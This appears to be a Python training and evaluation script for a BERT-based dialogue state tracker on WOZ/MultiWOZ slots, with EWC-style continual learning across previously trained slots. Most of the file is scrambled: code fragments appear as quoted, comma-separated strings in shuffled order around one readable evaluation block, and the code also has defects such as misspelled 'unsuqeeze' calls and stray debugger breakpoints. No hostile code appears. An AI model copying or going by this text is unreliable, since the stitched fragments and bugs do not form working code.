input_len = [len(tokens), 0] if tokens_b:", "parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to set the label encoder", "% (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args)", "\"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief", "[p for n, p in param_optimizer if not any(nd in n for nd", "if (step + 1) % args.gradient_accumulation_steps == 0: # modify learning rate with", "data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy =", "prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot])", "= prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base class for", "try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install", "if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def", "import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import", "* nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\", "= 0 for vid, value in enumerate(slot): if not value == 0: class_acc", "accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, 
        eval_loss = eval_loss / nb_eval_examples
        if eval_loss_slot is None:  # the multi-GPU path does not return per-slot losses
            eval_loss_slot = [0]
            prev_eval_loss_slot = [0]
        eval_accuracy = eval_accuracy / nb_eval_examples
        prev_eval_loss = prev_eval_loss / nb_eval_examples_prev
        prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev
        eval_acc_slot = eval_acc_slot / nb_eval_examples
        prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev

        total_acc_slot = {}
        for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id + prev_slot_id)):
            total_acc_slot[idx] = val
        total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0))

        loss = tr_loss / nb_tr_steps if args.do_train else None

        result = {'eval_loss': eval_loss,
                  'eval_accuracy': eval_accuracy,
                  'loss': loss,
                  'eval_loss_slot': '\t'.join([str(val / nb_eval_examples) for val in eval_loss_slot]),
                  'eval_acc_slot': '\t'.join([str((val).item()) for val in eval_acc_slot]),
                  'prev_eval_loss': prev_eval_loss,
                  'prev_eval_accuracy': prev_eval_accuracy,
                  'prev_eval_loss_slot': '\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]),
                  'prev_eval_acc_slot': '\t'.join([str((val).item()) for val in prev_eval_acc_slot]),
                  'total_acc_slot': '\t'.join([str(val[1].item()) for val in total_acc_slot])}

        out_file_name = 'eval_results'
        if args.target_slot == 'all':
            out_file_name += '_all'
        output_eval_file = os.path.join(args.output_dir, "%s.txt" % out_file_name)

        with open(output_eval_file, "w") as writer:
            logger.info("***** Eval results *****")
            for key in sorted(result.keys()):
                logger.info("  %s = %s", key, str(result[key]))
                writer.write("%s = %s\n" % (key, str(result[key])))
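        # The resulting eval_results*.txt is a flat "key = value" listing, e.g.
        # (values illustrative):
        #   eval_accuracy = 0.87
        #   eval_acc_slot = 0.91  0.88  ...   (tab-separated, one value per slot)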
    ###############################################################################
    # Analyze: TODO
    ###############################################################################

    if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
        pdb.set_trace()

        def draw(data, x, y, ax):
            seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y,
                            vmin=0.0, vmax=1.0, cbar=False, ax=ax)

        class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]
        class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]

        eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
        all_input_ids, all_input_len, all_label_ids = convert_examples_to_features(
            eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        all_input_ids, all_input_len, all_label_ids = \
            all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device)
        logger.info("***** Running analysis *****")
        logger.info("  Num examples = %d", len(eval_examples))
        logger.info("  Batch size = %d", 1)

        eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids)
        # Run prediction for full data
        eval_sampler = SequentialSampler(eval_data)
        eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1)

        model.eval()

        none_value_id = [len(val) - 1 for val in label_list]
        incorrect_dialogs = []
        attention_draw = 5

        for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc="Evaluating"):
            if input_ids.dim() == 2:
                input_ids = input_ids.unsqueeze(0)
                input_len = input_len.unsqueeze(0)
                label_ids = label_ids.unsqueeze(0)

            with torch.no_grad():
                _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)

            nturn = (label_ids[:, :, 0].view(-1) > -1).sum().item()
            nslot = label_ids.size(2)
            for slot in range(nslot):
                for turn in range(nturn):
                    class_count[slot][label_ids[0][turn][slot]] += 1
                    if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:
                        class_correct[slot][label_ids[0][turn][slot]] += 1

            # Ad-hoc inspection of the hotel domain (slot indices 8..17): compare
            # the gold and predicted value ids of the first ten turns against the
            # 'none' value id of each slot.
            drawfig = False
            print('hotel')
            print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
            print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
            print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1))
            print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1))
            pdb.set_trace()
raise ValueError(\"Invalid gradient_accumulation_steps parameter:", "Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import", "summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot", "text_a = line[2] # line[2]: user utterance text_b = line[3] # line[3]: system", "perform linear learning rate warmup for. \" \"E.g., 0.1 = 10%% of training.\")", "\"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys():", "= round(dev_loss, 6) if last_update is None or dev_loss < best_loss: # Save", "= torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features],", "= \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot,", "`InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection", "type=int, default=1, help=\"Number of updates steps to accumulate before performing a backward/update pass.\")", "for key in del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.',", "domain if slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx:", "type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer", "input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx <", "= all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length,", "length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break", "[len(labels) for labels in label_list] # Number of labels of all slots #prev_slot_id", "train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ##", "all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\",", "prev_label=None): self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label", "args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\") ###############################################################################", "label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length ==", "[] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in key) or", "import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import", "base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See", "default=64, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. 
\\n\" \"Sequences", "= ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1:", "loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss)", "model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], [] for labels", "tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids", "l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is", "# All slot value labels num_labels = [len(labels) for labels in label_list] #", "prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss =", "= [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0", "writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir,", "for idx, domain in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\":", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [", "x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog)", "fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if", "number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\",", "-1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50,", "= [] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc = 0", "loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss =", "dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience <= epoch: if", "acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if", "set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value", "torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length):", "all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev,", "len(processor.all_slot))) # list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir,", "eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy =", "= dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i,", "data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated", "/ args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## 
utterances", "prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step)", "parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head',", "self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot]", "Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs ==", "else label def _get_label(label, label_list): label_id = [] label_info = '' label_map =", "all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)", "= [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([", "Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)", "prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if", "label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc,", "= [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length", "flag if you want to set the label encoder trainable. \\n\" \"This option", "(max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx", "not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\")", "x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x in", "args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir,", "= None examples = [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\"", "os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and is", "type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True,", "int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')])", "summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" %", "on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test", "eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is", "','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot 
in", "trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(),", "if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if", "- 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a +", "label[0] == -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '')", "#prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) #", "l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l *", "del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids,", "in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in", "seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x", "prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss", "self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b,", "args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x,", "= batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids,", "> -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn", "data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in the list:", "\"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for", "== labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup", "torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() *", "'#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else:", "else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b =", "= lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset", "size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\",", "the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <=", "apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model = DDP(model) elif", "for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot):", "prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else:", "model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples,", "to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling", 
"eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,", "'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in slot_idx.items():", "args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) /", "pair in place to the maximum length.\"\"\" while True: total_length = len(tokens_a) +", "torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend which will take", "# The symbol '#' will be replaced with '[SEP]' after tokenization. text_a =", "[ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [", "in previous tasks class DataProcessor(object): \"\"\"Base class for data converters for sequence classification", "= None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc =", "config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology =", "[] for key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key):", "torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX", "os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir))", "FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else:", "+= '%s (id = %d) ' % (label, label_map[i][label]) return label_id, label_info features", "%d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data", "label embeddings. 
\\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings:", "model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], []", "in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence", "np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval", "help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run", "1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2)", "Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss,", "nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch =", "else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch,", "', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See", "raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps =", "analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer:", "############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank()", "rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict()", "rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list: new_key =", "label_id = [] label_info = '' label_map = [{_label: i for i, _label", "slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)", "','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev", "from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should", "label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a", "= %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len,", "for epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps =", "label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding", "alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ +", "+ text_b else: text_a = line[2] # line[2]: user utterance text_b = 
line[3]", "else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: #", "[ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw = 5 for", "* (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if", "optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total = t_total", "= [ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx", "bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory", "in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids,", "= line[3] # line[3]: system response label = [ line[4+idx] for idx in", "logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size", "enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn", "= 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):", "prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev", "+ l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples", "prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and", "# wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task", "model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples", "data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train", "for line in reader: if len(line) > 0 and line[0][0] == '#': #", "input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] =", "all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data)", "class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid],", "curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)]", "print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0,", "1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot):", "this training task self.prev_label = prev_label # trained slots in previous tasks class", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc", "label_list): label_id = [] label_info = '' label_map = [{_label: i 
###############################################################################
# Main
###############################################################################

def main():
    parser = argparse.ArgumentParser()

    ## Required parameters
    parser.add_argument('--data_dir', type=str, required=True,
                        help='location of the data corpus')
    parser.add_argument("--bert_model", default=None, type=str, required=True,
                        help="Bert pre-trained model selected in the list: bert-base-uncased, "
                             "bert-large-uncased, bert-base-cased, bert-large-cased, ...")
    parser.add_argument("--bert_dir", type=str, required=False,
                        help="The directory of the pretrained BERT model")
    parser.add_argument("--task_name", default=None, type=str, required=True,
                        help="The name of the task to train: bert-gru, bert-lstm, "
                             "bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding")
    parser.add_argument("--output_dir", default=None, type=str, required=True,
                        help="The output directory where the model predictions and checkpoints will be written.")
    parser.add_argument('--load_path', type=str, default='',
                        help='pretrained model directory name')
    parser.add_argument("--target_slot", default='', type=str, required=True,
                        help="Target slot idx to train model. ex. '0:1:2' or an excluding slot name 'attraction'")
    parser.add_argument("--prev_slot", default='', type=str, required=True,
                        help="Previously trained slots. ex. '0:1:2' or an excluding slot name 'attraction'")
    parser.add_argument("--tf_dir", default='tensorboard', type=str, required=False,
                        help="Tensorboard directory")
    parser.add_argument("--nbt", type=str, required=True,
                        help="nbt type: rnn, transformer or turn")
    parser.add_argument("--fix_utterance_encoder", action='store_true',
                        help="Do not train BERT utterance encoder")

    ## Other parameters
    parser.add_argument("--max_seq_length", default=64, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization. "
                             "Sequences longer than this will be truncated, and sequences shorter "
                             "than this will be padded.")
    parser.add_argument("--max_label_length", default=32, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization "
                             "for slot-value labels.")
    parser.add_argument("--max_turn_length", default=22, type=int,
                        help="The maximum total input turn length.")
    parser.add_argument('--hidden_dim', type=int, default=100,
                        help="hidden dimension used in belief tracker")
    parser.add_argument('--num_rnn_layers', type=int, default=1,
                        help="number of RNN layers")
    parser.add_argument('--zero_init_rnn', action='store_true',
                        help="set initial hidden of rnns zero")
    parser.add_argument('--skip_connect', type=str, default=False,
                        help="skip-connection")
    parser.add_argument('--attn_head', type=int, default=4,
                        help="the number of heads in multi-headed attention")
    parser.add_argument("--do_train", action='store_true',
                        help="Whether to run training.")
    parser.add_argument("--do_eval", action='store_true',
                        help="Whether to run eval on the test set.")
    parser.add_argument("--do_analyze", action='store_true',
                        help="Whether to run analysis on the test set.")
